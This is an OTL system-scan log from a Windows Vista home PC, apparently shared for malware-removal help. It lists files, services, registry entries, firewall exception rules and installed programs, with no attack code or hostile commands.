[2014/05/19 11:11:50 | 000,218,228 | ---- | C] () -- C:\Windows\System32\WFP.TMF
[2014/05/19 10:36:53 | 000,001,810 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Wireless Configuration Utility.lnk
[2014/05/19 10:36:53 | 000,001,792 | ---- | C] () -- C:\Users\Public\Desktop\Wireless Configuration Utility.lnk
[2014/05/19 10:36:52 | 000,036,864 | ---- | C] () -- C:\Windows\runSW.exe
[2011/04/13 09:54:46 | 000,000,000 | ---- | C] () -- C:\Users\Ken\AppData\Roaming\wklnhst.dat
[2010/12/20 22:50:46 | 014,835,712 | ---- | C] () -- C:\ProgramData\sandra.mda
[2010/09/19 03:06:28 | 000,001,356 | ---- | C] () -- C:\Users\Ken\AppData\Local\d3d9caps.dat
[2009/02/04 01:21:42 | 000,000,000 | ---- | C] () -- C:\ProgramData\LauncherAccess.dt
[2008/01/09 20:34:03 | 000,817,982 | ---- | C] () -- C:\ProgramData\LUUnInstall.LiveUpdate
[2008/01/02 18:37:37 | 000,000,132 | ---- | C] () -- C:\Users\Ken\BackupResult.DAT
[2008/01/02 17:50:03 | 000,004,608 | ---- | C] () -- C:\Users\Ken\Drive_K.BJF
[2007/12/05 11:52:50 | 000,141,824 | ---- | C] () -- C:\Users\Ken\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2007/12/04 11:33:31 | 007,602,176 | ---- | C] () -- C:\Users\Ken\NTUSER.bak
 
========== ZeroAccess Check ==========
 
[2006/11/02 08:54:22 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/03/25 09:26:04 | 011,587,584 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2009/04/11 02:28:19 | 000,614,912 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = %systemroot%\system32\wbem\wbemess.dll -- [2009/04/11 02:28:25 | 000,347,648 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
========== Custom Scans ==========
 
========== Base Services ==========
SRV - [2006/11/02 05:46:02 | 000,024,576 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\aelupsvc.dll -- (AeLookupSvc)
SRV - [2008/01/19 03:33:43 | 000,033,280 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\appinfo.dll -- (Appinfo)
SRV - [2008/01/19 03:33:01 | 000,059,392 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\alg.exe -- (ALG)
SRV - [2009/04/11 02:28:23 | 000,758,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\qmgr.dll -- (BITS)
SRV - [2009/04/11 02:28:18 | 000,334,848 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\BFE.DLL -- (BFE)
SRV - [2011/11/16 10:12:25 | 000,009,728 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\lsass.exe -- (KeyIso)
SRV - [2009/04/11 02:28:19 | 000,268,800 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\es.dll -- (EventSystem)
SRV - [2008/01/19 03:33:49 | 000,081,920 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\browser.dll -- (Browser)
SRV - [2013/07/08 00:16:55 | 000,133,120 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\cryptsvc.dll -- (CryptSvc)
SRV - [2009/04/11 02:28:24 | 000,550,400 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\rpcss.dll -- (DcomLaunch)
SRV - [2009/04/11 02:28:18 | 000,204,288 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\dhcpcsvc.dll -- (Dhcp)
SRV - [2011/03/02 11:44:27 | 000,086,528 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\System32\dnsrslvr.dll -- (Dnscache)
SRV - [2008/01/19 03:34:08 | 000,057,344 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\eapsvc.dll -- (EapHost)
SRV - [2009/04/11 02:28:19 | 000,026,112 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\hidserv.dll -- (hidserv)
SRV - [2008/01/19 03:34:34 | 000,288,256 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\System32\ipnathlp.dll -- (SharedAccess)
SRV - [2009/04/11 02:28:20 | 000,364,032 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\IPSECSVC.DLL -- (PolicyAgent)
SRV - [2014/03/11 10:13:24 | 000,022,216 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV - [2014/03/11 10:13:24 | 000,279,776 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV - [2009/04/11 02:28:24 | 000,311,808 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\swprv.dll -- (swprv)
SRV - [2008/01/19 03:34:49 | 000,045,056 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\mmcss.dll -- (MMCSS)
SRV - [2008/01/19 03:35:36 | 000,274,432 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\netman.dll -- (Netman)
SRV - [2008/01/19 03:35:36 | 000,237,056 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\netprofm.dll -- (netprofm)
SRV - [2008/01/19 03:35:38 | 000,168,448 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\nlasvc.dll -- (NlaSvc)
SRV - [2008/01/19 03:35:57 | 000,018,432 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\nsisvc.dll -- (nsi)
SRV - [2009/04/11 02:28:25 | 000,222,720 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\umpnpmgr.dll -- (PlugPlay)
SRV - [2010/08/17 10:11:37 | 000,128,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\spoolsv.exe -- (Spooler)
SRV - [2011/11/16 10:12:25 | 000,009,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\lsass.exe -- (ProtectedStorage)
SRV - [2009/04/11 02:28:19 | 000,564,224 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\emdmgmt.dll -- (EMDMgmt)
SRV - [2008/01/19 03:36:15 | 000,090,624 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\rasauto.dll -- (RasAuto)
SRV - [2009/04/11 02:28:24 | 000,262,144 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\rasmans.dll -- (RasMan)
SRV - [2009/04/11 02:28:24 | 000,550,400 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\rpcss.dll -- (RpcSs)
SRV - [2008/01/19 03:36:20 | 000,019,968 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\seclogon.dll -- (seclogon)
SRV - [2011/11/16 10:12:25 | 000,009,728 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\lsass.exe -- (SamSs)
SRV - [2009/04/11 02:28:26 | 000,061,440 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\wscsvc.dll -- (wscsvc)
SRV - [2010/09/06 12:20:29 | 000,125,952 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\srvsvc.dll -- (LanmanServer)
SRV - [2009/07/10 07:47:42 | 000,247,808 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\shsvcs.dll -- (ShellHWDetection)
SRV - [2009/04/11 02:27:49 | 003,408,896 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\SLsvc.exe -- (slsvc)
SRV - [2010/11/04 14:55:12 | 000,601,600 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\schedsvc.dll -- (Schedule)
SRV - [2009/04/11 02:28:24 | 000,242,688 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\tapisrv.dll -- (TapiSrv)
SRV - [2009/07/10 07:47:42 | 000,247,808 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\shsvcs.dll -- (Themes)
SRV - [2009/04/11 02:28:23 | 000,153,088 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\profsvc.dll -- (ProfSvc)
SRV - [2009/04/11 02:28:10 | 001,055,232 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\VSSVC.exe -- (VSS)
SRV - [2009/04/11 02:28:18 | 000,315,392 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\audiosrv.dll -- (Audiosrv)
SRV - [2009/04/11 02:28:18 | 000,315,392 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\audiosrv.dll -- (AudioEndpointBuilder)
SRV - [2008/01/19 03:36:20 | 000,104,960 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\sdrsvc.dll -- (SDRSVC)
SRV - [2008/01/19 03:38:24 | 000,272,952 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV - [2009/04/11 02:28:25 | 001,017,856 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\wevtsvc.dll -- (Eventlog)
SRV - [2009/04/11 02:28:20 | 000,407,552 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\MPSSVC.dll -- (MpsSvc)
SRV - [2009/04/11 02:28:25 | 000,453,120 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\wiaservc.dll -- (stisvc)
SRV - [2009/04/11 02:27:45 | 000,073,216 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\msiexec.exe -- (msiserver)
SRV - [2009/04/11 02:28:25 | 000,162,304 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\wbem\WMIsvc.dll -- (Winmgmt)
SRV - [2012/06/02 18:19:17 | 001,933,848 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\wuaueng.dll -- (wuauserv)
SRV - [2009/04/11 02:28:18 | 000,175,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\dot3svc.dll -- (dot3svc)
SRV - [2009/07/11 15:01:42 | 000,513,536 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\wlansvc.dll -- (Wlansvc)
SRV - [2009/06/10 07:42:23 | 000,160,256 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\wkssvc.dll -- (LanmanWorkstation)
 
< %SYSTEMDRIVE%\*.exe >
[2007/11/07 09:03:18 | 000,562,688 | ---- | M] (Microsoft Corporation) -- C:\install.exe
 
< dir "%systemdrive%\*" /S /A:L /C >
 Volume in drive C is ACER
 Volume Serial Number is 609A-69D2
 Directory of C:\
11/02/2006  09:02 AM    <JUNCTION>     Documents and Settings [C:\Users]
               0 File(s)              0 bytes
 Directory of C:\ProgramData
11/02/2006  09:02 AM    <JUNCTION>     Application Data [C:\ProgramData]
11/02/2006  09:02 AM    <JUNCTION>     Desktop [C:\Users\Public\Desktop]
11/02/2006  09:02 AM    <JUNCTION>     Documents [C:\Users\Public\Documents]
11/02/2006  09:02 AM    <JUNCTION>     Favorites [C:\Users\Public\Favorites]
11/02/2006  09:02 AM    <JUNCTION>     Start Menu [C:\ProgramData\Microsoft\Windows\Start Menu]
11/02/2006  09:02 AM    <JUNCTION>     Templates [C:\ProgramData\Microsoft\Windows\Templates]
               0 File(s)              0 bytes
 Directory of C:\Users
11/02/2006  09:02 AM    <SYMLINKD>     All Users [C:\ProgramData]
11/02/2006  09:02 AM    <JUNCTION>     Default User [C:\Users\Default]
               0 File(s)              0 bytes
 Directory of C:\Users\All Users
11/02/2006  09:02 AM    <JUNCTION>     Application Data [C:\ProgramData]
11/02/2006  09:02 AM    <JUNCTION>     Desktop [C:\Users\Public\Desktop]
11/02/2006  09:02 AM    <JUNCTION>     Documents [C:\Users\Public\Documents]
11/02/2006  09:02 AM    <JUNCTION>     Favorites [C:\Users\Public\Favorites]
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 104 bytes -> C:\ProgramData\TEMP:5C321E34

< End of report >
 

OTL Extras logfile created on: 5/20/2014 2:17:11 PM - Run 4
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Ken\Desktop
Windows Vista Home Premium Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
3.00 Gb Total Physical Memory | 1.73 Gb Available Physical Memory | 57.84% Memory free
6.20 Gb Paging File | 4.72 Gb Available in Paging File | 76.12% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 111.69 Gb Total Space | 51.32 Gb Free Space | 45.95% Space Free | Partition Type: NTFS
Drive D: | 111.43 Gb Total Space | 35.69 Gb Free Space | 32.03% Space Free | Partition Type: NTFS
Drive F: | 74.53 Gb Total Space | 29.77 Gb Free Space | 39.95% Space Free | Partition Type: NTFS
 
Computer Name: KEN-HOME | User Name: Ken | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (SafeList) ==========
 
 
========== File Associations ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\System32\control.exe (Microsoft Corporation)
.hlp [@ = hlpfile] -- C:\Windows\winhlp32.exe (Microsoft Corporation)
.html [@ = FirefoxHTML] -- C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)
 
========== Shell Spawning ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
hlpfile [open] -- %SystemRoot%\winhlp32.exe %1 (Microsoft Corporation)
htmlfile [edit] -- Reg Error: Key error.
htmlfile [print] -- rundll32.exe %windir%\system32\mshtml.dll,PrintHTML "%1"
http [open] -- "C:\Program Files\Mozilla Firefox\firefox.exe" -requestPending -osint -url "%1" (Mozilla Corporation)
https [open] -- "C:\Program Files\Mozilla Firefox\firefox.exe" -requestPending -osint -url "%1" (Mozilla Corporation)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [runas] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /separate,/e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
 
========== Security Center Settings ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
"UacDisableNotify" = 1
"InternetSettingsDisableNotify" = 1
"AutoUpdateDisableNotify" = 1
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
"DisableMonitoring" = 1
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]
"DisableMonitoring" = 1
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]
"DisableMonitoring" = 1
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
"VistaSp1" = Reg Error: Unknown registry data type -- File not found
"VistaSp2" = Reg Error: Unknown registry data type -- File not found
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
 
========== Firewall Settings ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
========== Authorized Applications List ==========
 
 
========== Vista Active Open Ports Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{106BC7FE-8355-457C-BFA8-F1074063E433}" = rport=3702 | protocol=17 | dir=out | svc=fdphost | app=%systemroot%\system32\svchost.exe |
"{48958506-A8CD-48C1-8F62-70C58A765893}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{55D2CB44-E5EA-489D-B414-9FF869D82F14}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{76E29047-A11F-4C9B-BC08-E0AFE11B5A9C}" = rport=2177 | protocol=6 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{91957554-9ECD-4B6D-AA0B-9C79FEDDE178}" = lport=rpc | protocol=6 | dir=in | app=c:\program files\sisoftware\sisoftware sandra lite 2011\wnt500x86\rpcsandrasrv.exe |
"{9EDE1089-0741-41CF-9CF9-C053C060AFC5}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{AA18607F-388B-49CE-8246-4D0AB9310B4D}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{B60D5705-E5D4-441D-8DF6-5E1167E3C56B}" = rport=2177 | protocol=17 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{B7653951-C57B-4B2C-AA5E-B01E34481C5B}" = lport=rpc | protocol=6 | dir=in | app=c:\program files\sisoftware\sisoftware sandra lite 2011\rpcagentsrv.exe |
"{BCD97FA1-4FE7-47EC-82C2-F82A2F1A246E}" = lport=6004 | protocol=17 | dir=in | app=c:\program files\microsoft office\office14\outlook.exe |
"{CC3D8D74-667A-4B23-87C5-BD9EE183AE6C}" = lport=3702 | protocol=17 | dir=in | svc=fdphost | app=%systemroot%\system32\svchost.exe |
"{CC6E4E85-CFF3-4E7F-99B9-F9EFCE589C29}" = lport=10243 | protocol=6 | dir=in | app=system |
"{D07CE674-A1B4-4501-8089-186E8CE65FFE}" = lport=2177 | protocol=6 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{D6369010-73BB-4A38-B45A-C29FF3ECC8DC}" = lport=2177 | protocol=17 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{DB763260-73EC-469B-B9B3-327F0F67553B}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{E3D0F135-A936-4483-9F26-02B050170269}" = rport=10243 | protocol=6 | dir=out | app=system |
"{EACF02C1-1FA6-48FC-B3D0-75DFC9490B03}" = lport=2869 | protocol=6 | dir=in | app=system |
"{EBEBF4B8-1FE1-40F7-9BF3-B80314B24516}" = rport=3702 | protocol=17 | dir=out | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
"{F27555A7-D46A-4A65-AE55-0C0D02535108}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{F35C4CAC-A04A-418B-9A49-F1888C428E01}" = lport=3702 | protocol=17 | dir=in | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
 
========== Vista Active Application Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{0FB7A62C-5ED9-459F-AB82-53E03E461B80}" = protocol=1 | dir=in | name=sisoftware deployment agent service (icmp-in) |
"{11331B79-19CC-498C-8F37-8E8ABE03B386}" = protocol=6 | dir=in | app=c:\users\ken\appdata\roaming\dropbox\bin\dropbox.exe |
"{1AE7FCD7-AC27-4279-AC61-42957246D6C8}" = dir=in | app=c:\program files\common files\apple\apple application support\webkit2webprocess.exe |
"{362ED1A3-095C-4AA5-9599-BD008DCA7AFC}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |
"{3D2E9305-ECB4-4CB3-96FB-533D0AD0BECB}" = protocol=17 | dir=in | app=c:\program files\teamviewer\version7\teamviewer.exe |
"{3E721B21-B723-4D8E-8AA6-ABF924AC8D7E}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{416B879A-AE10-4241-814C-9D51DE9B9F21}" = protocol=6 | dir=in | app=c:\program files\samsung\samsung new pc studio\npsvsvr.exe |
"{53EB3A80-B586-42F9-820C-162A7036F0D7}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{55454CB3-B412-43EC-9072-6D34F34E91DF}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |
"{5E4CF4F5-FD3E-47BC-9915-06599F4BDC0A}" = protocol=6 | dir=in | app=c:\program files\samsung\samsung new pc studio\npsasvr.exe |
"{63BDA66F-38D8-4C41-916B-F731F0A665AC}" = protocol=17 | dir=in | app=c:\program files\microsoft office\office14\onenote.exe |
"{6560E52C-B2ED-4B25-A27C-D35A419D9E61}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |
"{7B480FB5-7C1F-4BBB-B59A-1603A491FAE2}" = protocol=6 | dir=in | app=c:\program files\teamviewer\version8\teamviewer_service.exe |
"{7D365033-B573-4772-878E-F3AE43A122E8}" = protocol=6 | dir=in | app=c:\program files\yahoo!\messenger\yahoomessenger.exe |
"{7F09CB32-E3DC-464D-AE2E-C41052C2A191}" = protocol=6 | dir=out | app=system |
"{82714B84-CB07-4A33-8DAB-44109F2C38E2}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |
"{83FC0D0F-FB88-4015-8207-004D8A572678}" = protocol=17 | dir=in | app=c:\program files\yahoo!\messenger\yahoomessenger.exe |
"{8953BE9D-7772-4E2B-B748-C0CF748F77D3}" = protocol=6 | dir=in | app=c:\program files\teamviewer\version7\teamviewer.exe |
"{8D16E20D-3E66-48AA-9E43-34F24A012ADC}" = protocol=6 | dir=in | app=c:\program files\microsoft office\office14\groove.exe |
"{8E3691E1-B7E3-4997-B4B1-064A5CA91085}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{911C6DD1-2C49-49FC-B22D-BC6A59F27E6C}" = protocol=6 | dir=in | app=c:\program files\acer arcade live\acer homemedia connect\kernel\dms\clmsserver.exe |
"{919B4384-9CC5-4257-A6FD-DC37B7FEAB98}" = protocol=17 | dir=in | app=c:\program files\microsoft office\office14\groove.exe |
"{9342665A-E4CC-4DBA-B873-E2A46738B367}" = protocol=17 | dir=in | app=c:\program files\samsung\samsung new pc studio\npsasvr.exe |
"{99FA0787-D4E2-4033-BF6E-C5E90F3E1437}" = protocol=17 | dir=in | app=c:\program files\teamviewer\version8\teamviewer_service.exe |
"{9BECEB03-064B-4419-B5D7-9E2BA8C65823}" = protocol=17 | dir=in | app=c:\program files\teamviewer\version7\teamviewer_service.exe |
"{A218189A-937F-46D6-96C6-732B1B236605}" = protocol=17 | dir=in | app=c:\program files\acer arcade live\acer homemedia connect\kernel\dms\clmsserver.exe |
"{A8E4D800-E9E5-4493-B58C-E9FBF3CBFEC1}" = protocol=6 | dir=in | app=c:\program files\teamviewer\version8\teamviewer.exe |
"{AA7CE929-878F-492E-B8B1-CDB2569B626B}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |
"{B61AC4FB-67E7-483F-AE62-136CC9B587AD}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{BA314D66-723B-46A5-AA8A-5B5832314145}" = protocol=6 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |
"{BCDA565E-DEEB-4121-BF50-880D9C95FA8C}" = protocol=6 | dir=in | app=c:\program files\teamviewer\version7\teamviewer_service.exe |
"{C54FF50D-CD65-4B5A-A5DE-85AB1B4E0B8A}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |
"{C65B677A-11E8-4344-9C96-51199BDF88AA}" = protocol=17 | dir=in | app=c:\program files\teamviewer\version8\teamviewer.exe |
"{D0B84D61-009E-49B9-85A1-76A9E666FDFE}" = protocol=17 | dir=in | app=c:\program files\samsung\samsung new pc studio\npsvsvr.exe |
"{D4ED61CF-112E-40A7-BDB6-F7A4E45BC418}" = protocol=6 | dir=in | app=c:\program files\microsoft office\office14\onenote.exe |
"{DB7012B0-3D6C-4142-8918-456231EA418A}" = protocol=17 | dir=in | app=c:\users\ken\appdata\roaming\dropbox\bin\dropbox.exe |
"{DCE2718A-F223-47B2-A02C-8F7DCF77D2DC}" = protocol=1 | dir=in | name=sisoftware sandra agent service (icmp-in) |
"{EBFAE151-F926-441F-82FC-67BFEA8A4F09}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |
"TCP Query User{1657F1AF-DD92-42D0-BD6C-7DA40FA59210}C:\users\ken\appdata\roaming\dropbox\bin\dropbox.exe" = protocol=6 | dir=in | app=c:\users\ken\appdata\roaming\dropbox\bin\dropbox.exe |
"TCP Query User{34C7ADAD-E07A-4497-B171-235D12964546}C:\program files\motorola\rsd lite\sdl.exe" = protocol=6 | dir=in | app=c:\program files\motorola\rsd lite\sdl.exe |
"TCP Query User{9D9EBD86-A35C-49FA-A3B0-47873F2AEDD9}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe" = protocol=6 | dir=in | app=c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe |
"TCP Query User{B21FF375-76DA-4B6A-9368-D305E81B8ECB}C:\program files\winamp\winamp.exe" = protocol=6 | dir=in | app=c:\program files\winamp\winamp.exe |
"TCP Query User{EAED830C-A35D-43EE-AB14-13EB1FAF796A}C:\program files\winamp\winamp.exe" = protocol=6 | dir=in | app=c:\program files\winamp\winamp.exe |
"UDP Query User{0410944C-A150-4C5D-9A6C-5567A9D1C4BC}C:\users\ken\appdata\roaming\dropbox\bin\dropbox.exe" = protocol=17 | dir=in | app=c:\users\ken\appdata\roaming\dropbox\bin\dropbox.exe |
"UDP Query User{10524813-1FFF-479A-B542-D516F9D99FDB}C:\program files\winamp\winamp.exe" = protocol=17 | dir=in | app=c:\program files\winamp\winamp.exe |
"UDP Query User{261929B5-2AA6-4E76-B732-33E160B58C71}C:\program files\winamp\winamp.exe" = protocol=17 | dir=in | app=c:\program files\winamp\winamp.exe |
"UDP Query User{3042571E-D61B-4E94-A4C7-B5DC5C28F397}C:\program files\motorola\rsd lite\sdl.exe" = protocol=17 | dir=in | app=c:\program files\motorola\rsd lite\sdl.exe |
"UDP Query User{92FFD427-CB41-4630-A841-A4ED4E26E972}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe" = protocol=17 | dir=in | app=c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe |
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0840B4D6-7DD1-4187-8523-E6FC0007EFB7}" = Windows Live ID Sign-in Assistant
"{1577A05B-EE62-4BBC-9DB7-FE748FA44EC2}" = NTI CD & DVD-Maker
